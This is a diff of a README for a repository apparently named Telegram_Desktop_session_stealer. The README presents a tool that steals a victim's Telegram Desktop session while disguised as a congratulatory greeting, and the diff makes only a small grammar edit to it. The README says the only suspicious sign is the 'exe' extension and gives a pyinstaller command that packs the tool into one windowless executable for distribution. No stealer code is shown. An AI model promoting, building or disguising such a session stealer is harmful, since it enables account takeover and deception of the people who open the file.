PyotrNestyurkin/Telegram_Desktop_session_stealer/README.md

 # Telegram_Desktop_session_stealer
 Application that steals the Telegram Desctop session and looks like congratulation.
-The only thing that can arouse suspicion is "exe" extension.
+The only thing that can arouse suspicion is the "exe" extension.

 # Instruction
 1) To create standalone application type: "pyinstaller --add-data "*.png;." --add-data "*.gif;." --noconsole --onefile main.py".